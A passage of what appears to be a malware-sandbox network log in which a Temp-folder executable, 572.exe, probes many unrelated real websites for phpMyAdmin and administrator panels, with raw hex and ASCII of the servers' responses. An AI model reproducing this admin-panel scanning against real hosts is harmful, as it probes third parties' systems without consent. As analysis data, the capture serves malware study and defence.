                                                                                                                                                                                                                                                                                                                                                                Server-Timing: edge; dur=1
                                                                                                                                                                                                                                                                                                                                                                Server-Timing: ak_p; desc="1707131692451_1611129006_213760407_15_10881_106_0_-";dur=1
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 48 31 3e 0a 20 0a 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 6e 61 75 6b 72 69 67 75 6c 66 26 23 34 36 3b 63 6f 6d 26 23 34 37 3b 77 70 26 23 34 35 3b 61 64 6d 69 6e 26 23 34 37 3b 22 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 50 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 31 38 26 23 34 36 3b 61 65 65 30 30 37 36 30 26 23 34 36 3b 31 37 30 37 31 33 31 36 39 32 26 23 34 36 3b 63 62 64 62 39 39 37 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <HTML><HEAD><TITLE>Access Denied</TITLE></HEAD><BODY><H1>Access Denied</H1> You don't have permission to access "http&#58;&#47;&#47;naukrigulf&#46;com&#47;wp&#45;admin&#47;" on this server.<P>Reference&#32;&#35;18&#46;aee00760&#46;1707131692&#46;cbdb997</BODY></HTML>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                266192.168.2.656515185.51.191.4880524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.420301914 CET185OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: innovationdevelopment.eu
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.722978115 CET1286INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: PHPSESSID=a70def476c68db4037c73b8083a0adcb; expires=Tue, 06-Feb-2024 11:14:51 GMT; Max-Age=86400; path=/
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: VISITORID=6f23480ee7ffaf87556eb25c893227a7; expires=Tue, 06-Feb-2024 11:14:51 GMT; Max-Age=86400
                                                                                                                                                                                                                                                                                                                                                                Upgrade: h2,h2c
                                                                                                                                                                                                                                                                                                                                                                Connection: Upgrade, close
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 33 33 36 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 21 2d 2d 20 43 72 65 61 74 65 64 20 62 79 20 65 78 63 6f 72 65 20 2d 20 53 6e 61 6b 65 20 76 31 2e 38 30 38 20 2d 20 64 6f 62 6f 73 2e 6f 6c 69 76 65 72 40 6e 73 69 6e 66 6f 2e 68 75 20 2d 2d 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 6e 73 3a 66 62 3d 22 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 2f 66 62 23 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 74 69 74 6c 65 3e 49 6e 6e 6f 6d 65 3c 2f 74 69 74 6c 65 3e 0d 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 79 73 74 65 6d 2e 63 73 73 3f 76 3d 31 2e 38 30 38 22 20 2f 3e 0d 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 66 6c 61 67 73 2e 63 73 73 3f 76 3d 31 2e 38 30 38 22 20 2f 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 65 2d 6d 6f 62 69 6c 65 2d 77 65 62 2d 61 70 70 2d 63 61 70 61 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 79 65 73 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 65 2d 6d 6f 62 69 6c 65 2d 77 65 62 2d 61 70 70 2d 73 74 61 74 75 73 2d 62 61 72 2d 73 74 79 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 62 6c 61 63 6b 22 20 2f 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 4d 6f 62 69 6c 65 4f 70 74 69 6d 69 7a 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 22 20 2f 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 48 61 6e 64 68 65 6c 64 46 72 69 65 6e 64 6c 79 22 20 63 6f 6e 74 65 6e 74 3d 22 74 72 75 65 22 20 2f 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6c 65 61 72 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 6f 6e 22 20 2f 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 63 61 72 64 22 20 63 6f 6e 74 65 6e 74 3d 22 73 75 6d 6d 61 72 79 5f 6c 61 72 67 65 5f 69 6d 61 67 65 22 3e 0d 0a 09 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 3362<!DOCTYPE html>... Created by excore - Snake v1.808 - dobos.oliver@nsinfo.hu --><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://ogp.me/ns/fb#"><head><title>Innome</title><link rel="stylesheet" href="/css/system.css?v=1.808" /><link rel="stylesheet" href="/css/flags.css?v=1.808" /><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-status-bar-style" content="black" /><meta name="MobileOptimized" content="width" /><meta name="HandheldFriendly" content="true" /><meta http-equiv="cleartype" content="on" /><meta name="twitter:card" content="summary_large_image"><meta http
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.723051071 CET1286INData Raw: 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0d 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: -equiv="Content-Type" content="text/html; charset=UTF-8" /><link rel="stylesheet" href="/sites/default/css/main.css?v=1.808" /><link rel="stylesheet" media=print href="/sites/default/css/print.css?v=1.808" /><link rel="styleshee
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.723064899 CET1286INData Raw: 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2f 75 69 2f 6a 71 75 65 72 79 2e 75 69 2e 65 66 66 65 63 74 2d 66 61 64 65 2e 6d 69 6e 2e 6a 73 22 3e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <script type="text/javascript" src="/js/jquery/ui/jquery.ui.effect-fade.min.js"></script><script type="text/javascript" src="/js/jquery/ui/jquery.ui.datepicker.min.js"></script><script type="text/javascript" src="/js/jquery/jquery.auto
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.723077059 CET1286INData Raw: 66 3d 22 68 74 74 70 3a 2f 2f 69 6e 6e 6f 76 61 74 69 6f 6e 64 65 76 65 6c 6f 70 6d 65 6e 74 2e 65 75 2f 70 6c 2f 70 68 70 6d 79 61 64 6d 69 6e 2f 22 20 2f 3e 0d 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: f="http://innovationdevelopment.eu/pl/phpmyadmin/" /><link rel="alternate" hreflang="ro" href="http://innovationdevelopment.eu/ro/phpmyadmin/" /><link rel="alternate" hreflang="sk" href="http://innovationdevelopment.eu/sk/phpmyadmin/" />
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.723088980 CET1286INData Raw: 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 61 6a 61 78 27 29 2e 73 72 63 3d 27 73 69 74 65 73 2f 64 65 66 61 75 6c 74 2f 63 6f 6e 74 65 6e 74 2f 61 6a 61 78 2f 66 62 77 2e 70 68 70 3f 6d 3d 67 79 65 6e 67 65 6e 6c 61 74
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: cument.getElementById('ajax').src='sites/default/content/ajax/fbw.php?m=gyengenlato'"><img src="/images/fbw.gif" style="max-width:24px;max-height:24px;width:auto;height:auto;" alt="Low vision version" /></a><a href="javascript
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.723103046 CET1286INData Raw: 49 6e 6e 6f 6d 65 22 3e 3c 69 6d 67 20 73 72 63 3d 22 69 6d 61 67 65 73 2f 6c 6f 67 6f 2e 70 6e 67 22 20 61 6c 74 3d 22 49 6e 6e 6f 6d 65 22 20 2f 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 65 6e 75 22
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: Innome"><img src="images/logo.png" alt="Innome" /></a></div><div class="menu"><a href="/en/ims/what-is-it">IMS</a><a href="/en/project/about">Project</a><a href="/en/outputs/guide">Outputs</a><a href="/en/contact">
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.723115921 CET1286INData Raw: 63 72 65 65 6e 5f 73 69 7a 65 73 2e 70 68 70 3f 77 3d 27 2b 73 63 72 65 65 6e 2e 77 69 64 74 68 2b 27 26 68 3d 27 2b 73 63 72 65 65 6e 2e 68 65 69 67 68 74 3b 7d 29 3b 3c 2f 73 63 72 69 70 74 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 4c
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: creen_sizes.php?w='+screen.width+'&h='+screen.height;});</script><div class="LAW_cookie_alert" style="display:block;">By using this site you agree that this site uses cookies.<br><a href="javascript:void();" onClick="LAWsetC
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.723128080 CET1286INData Raw: 20 63 61 6c 6c 65 64 20 61 20 63 6f 6f 6b 69 65 20 28 63 6f 6f 6b 69 65 73 29 20 6d 61 79 20 70 6c 61 63 65 20 64 75 72 69 6e 67 20 74 68 65 20 75 73 65 20 6f 66 20 74 68 65 20 77 65 62 73 69 74 65 20 75 73 65 72 27 73 20 63 6f 6d 70 75 74 65 72
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: called a cookie (cookies) may place during the use of the website user's computer or mobile device, which is managed by the browser (eg. unique ID, website names, numbers and alphabetical character). <br> <b> types of cookies </ b> <br> Stora
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.723140001 CET1286INData Raw: 73 69 63 20 73 65 74 74 69 6e 67 20 63 6f 6f 6b 69 65 73 2c 20 62 75 74 20 79 6f 75 20 63 61 6e 20 64 69 73 61 62 6c 65 20 74 68 65 6d 20 62 79 20 74 68 65 20 75 73 65 72 2c 20 74 6f 20 72 65 6a 65 63 74 20 69 74 2e 20 3c 62 72 3e 20 64 69 73 61
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: sic setting cookies, but you can disable them by the user, to reject it. <br> disable the cookies are requested to make the necessary settings on the computer or mobile device Internet browser / browser's settings menu (ban, withdrawal). <br>
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.723151922 CET1286INData Raw: 0d 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6f 6f 74 65 72 5f 74 69 74 6c 65 22 3e 50 61 72 74 6e 65 72 73 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6f 6f 74 65 72 5f 6c 6f 67 6f 73 22 3e 3c 70 3e 3c
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <div class="footer_title">Partners</div><div class="footer_logos"><p><img alt="" src="/ckfinder/userfiles/images/logo_nf.png" style="height:35px; width:91px" /> <img alt="" src="/ckfinder/userfiles/images/TREBAG_nagyon_uj_angol.png
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.740628958 CET830INData Raw: 6f 2e 70 6e 67 22 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 32 39 70 78 3b 20 77 69 64 74 68 3a 32 39 70 78 22 20 2f 3e 3c 2f 61 3e 3c 2f 70 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6f 6f 74 65 72 5f
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: o.png" style="height:29px; width:29px" /></a></p></div><div class="footer_title">Get the latest information about the project!</div><div class="footer_newsletter"><form action="/en/newsletter" method="POST"><input


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                267192.168.2.65652477.240.114.21280524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.431773901 CET173OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: mw.redsa.net
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.660943031 CET437INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                                                Location: https://mw.redsa.net/phpmyadmin/
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 240
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 77 2e 72 65 64 73 61 2e 6e 65 74 2f 70 68 70 6d 79 61 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://mw.redsa.net/phpmyadmin/">here</a>.</p></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                268192.168.2.65634113.248.169.4880524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.436567068 CET179OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: secure.vexcorp.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.767009020 CET1190INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: openresty
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:52 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 315
                                                                                                                                                                                                                                                                                                                                                                Last-Modified: Mon, 29 Jan 2024 23:30:02 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                ETag: "65b834fa-13b"
                                                                                                                                                                                                                                                                                                                                                                X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_IPHdRT2v0DTuQWUIYxcT5Axz2Sc/KAfLwC7kZ/TTT2BOfhmzGY1yScfhhvuOXcK148JYZ46hF9ERhmh8sScRYg
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: caf_ipaddr=81.181.57.74;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: country=RO;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: city="";Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: lander_type=forwarder;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: expiry_partner=;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: _policy={"restricted_market":false,"tracking_market":"none"};Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 2f 3e 3c 73 63 72 69 70 74 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 70 61 72 6b 69 6e 67 2d 6c 61 6e 64 65 72 2f 73 74 61 74 69 63 2f 6a 73 2f 66 6f 72 77 61 72 64 65 72 2e 39 39 36 32 64 30 30 30 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 69 64 3d 22 72 6f 6f 74 22 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!doctype html><html lang="en"><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="icon" href="data:,"/><script defer="defer" src="https://img1.wsimg.com/parking-lander/static/js/forwarder.9962d000.js"></script></head><body><div id="root"></div></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                269192.168.2.65639445.60.74.5080524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.454994917 CET184OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: zuhauseplus.vodafone.de
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                270192.168.2.656569190.202.2.8080524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.463031054 CET191OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: contribuyente.seniat.gob.ve
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.632477999 CET499INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:52 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Oracle-Application-Server-10g
                                                                                                                                                                                                                                                                                                                                                                Location: http://contribuyente.seniat.gob.ve/index.htm
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 66 38 20 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 63 6f 6e 74 72 69 62 75 79 65 6e 74 65 2e 73 65 6e 69 61 74 2e 67 6f 62 2e 76 65 2f 69 6e 64 65 78 2e 68 74 6d 22 3e 68 65 72 65 3c 2f 41 3e 2e 3c 50 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: f8 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>301 Moved Permanently</TITLE></HEAD><BODY><H1>Moved Permanently</H1>The document has moved <A HREF="http://contribuyente.seniat.gob.ve/index.htm">here</A>.<P></BODY></HTML>0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.633280039 CET186OUTGET /index.htm HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: contribuyente.seniat.gob.ve
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:52.800512075 CET1160INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:52 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Oracle-Application-Server-10g
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: HttpOnly;Secure
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'self';
                                                                                                                                                                                                                                                                                                                                                                X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                                                                                                                                                                                                                Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                                                                                                                                Clear-Site-Data: cache
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: DENY, SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                Feature-Policy: layout-animations 'none'; unoptimized-images 'none'; oversized-images 'none'; sync-script 'none'; sync-xhr 'none'; unsized-media 'none';
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                Expect-CT: enforce; max-age=43200
                                                                                                                                                                                                                                                                                                                                                                Public-Key-Pins: none
                                                                                                                                                                                                                                                                                                                                                                Last-Modified: Mon, 15 May 2023 15:21:36 GMT
                                                                                                                                                                                                                                                                                                                                                                ETag: "11fc95-2dd-64624e00"
                                                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 733
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
